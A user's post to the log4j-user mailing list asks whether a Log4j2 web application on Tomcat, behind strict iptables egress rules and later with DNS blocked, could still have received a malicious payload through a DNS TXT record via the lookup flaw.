Dear log4j experts, It's sad that this nice project gets so much negative attention because of the current security issue.
I have a question to analyse the impact for me: I've been using Log4j2 in a web application run in Tomcat 9.0 (always latest version). On my Linux machine, this Tomcat instance runs as a dedicated user (e.g. "tomcatappuser"). Through iptables this user has never been allowed to make any outgoing connections to the Internet except for a few whitelisted IP addresses of used REST interfaces. So the web application was never able to connect to arbitrary external IP addresses through any port (HTTP, LDAP, ...). No outgoing TCP, UDP or ICMP connections possible except to whitelisted trustworthy IP addresses. BUT it was allowed to resolve host names through 2 whitelisted DNS server IP addresses (let's say e.g. 8.8.8.8). Now I've even blocked that and put the host name / IP address mappings of the used REST endpoints into /etc/hosts. I have no indication that the Log4j vulnerability actually has been exploited on my system to do any harm. But could a malicious payload have arrived on my system inside the DNS response of my legitimate DNS server? I'm thinking of a TXT record that might contain a serialized Java object...? Was this also possible through this lookup expression resolution flaw? Thanks in advance for your thoughts! Reg --------------------------------------------------------------------- To unsubscribe, e-mail: log4j-user-unsubscr...@logging.apache.org For additional commands, e-mail: log4j-user-h...@logging.apache.org
